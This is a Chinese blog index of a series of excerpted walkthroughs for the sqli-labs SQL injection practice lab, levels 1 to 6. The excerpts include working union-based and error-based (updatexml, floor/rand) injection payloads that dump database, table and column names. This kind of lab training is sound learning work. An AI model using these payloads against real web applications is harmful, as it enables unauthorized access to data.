![](https://img-blog.csdnimg.cn/20201014180756927.png?x-oss-process=image/resize,m_fixed,h_64,w_64)
sqli-labs
Drunkmars
这个作者很懒,什么都没留下…
展开
-
sqli-labs系列——第六关
less6这个本质上跟第五关相同都是使用报错注入,这一关使用的是双引号闭合还是使用updatexml()这个函数?id=1" union select updatexml(1,concat(0x7e,(select user()),0x7e),1)--+爆库名:?id=1" union select updatexml(1,concat(0x7e,(select database()),0x7e),1)--+爆表名:?id=1" union select updatexml(1,con原创 2021-01-15 18:09:02 · 2292 阅读 · 3 评论 -
sqli-labs系列——第五关
less5更改id后无果,不能用union联合查询此处用报错注入报错注入的概念:(1). 通过floor报错 and (select 1 from (select count(*),concat((payload),floor (rand(0)*2))x from information_schema.tables group byx)a) 其中payload为你要插入的SQL语句 需要注意的是该语句将 输出字符长度限制为64个字符(2). 通过updatexml报错 and update原创 2021-01-15 15:44:11 · 2292 阅读 · 3 评论 -
sqli-labs系列——第四关
less4第四关的sql语句是这样的:select * from user where id=("$id");?id=1")–+回显正常order by 4报错,有3列union select 判断有无显示位爆数据库名和列名:?id=-1") union select 1,(select group_concat(schema_name) from information_schema.schemata),(select group_concat(table_name) from inf原创 2021-01-15 15:12:55 · 794 阅读 · 0 评论 -
sqli-labs系列——第三关
less3判断注入类型这第三关有点意思,是一个带括号的数字型注入,这里需要闭合它的括号,之前遇到过很多这样的站,它的sql语句一般都是这样的:$sql = select * from user where id=('$id');看一下输入’后的信息,能够判断出这是一个数字型注入:此时的sql语句应为:select * from user where id=('1''); ?id=1’ --+报错,?id=1’) --+回显正常此时的sql语句:select * from user wh原创 2021-01-15 15:02:06 · 637 阅读 · 1 评论 -
sqli-labs系列——第二关
less2and 1=1有回显,and 1=2无回显,为数值型注入order by 4–+报错,有3行查询数据库名?id=0' union select 1,(select group_concat(schema_name) from information_schema.schemata),3 --+查询列名?id=0 union select 1,(select group_concat(schema_name) from information_schema.schemata),(原创 2021-01-15 14:50:44 · 247 阅读 · 0 评论 -
sqli-labs系列——第一关
php学习告一段落,接下来的时间就是web渗透的练习了,先看了一遍关于sql的一些知识点,通关sqli-labs加深下印象。之前也因为作业的原因通关过前10关,但那时候不懂得原理,跟着网上的教程做的,所以这次尝试自己思考通关。less1尝试and1=2,不为数值注入加单引号报错,判断为单引号字符注入判断表有几行数据,order by 4–+时报错用union联合查询有无显示位查询数据库名?id=0' union select 1,(select group_concat(schema_原创 2021-01-15 14:46:16 · 2171 阅读 · 0 评论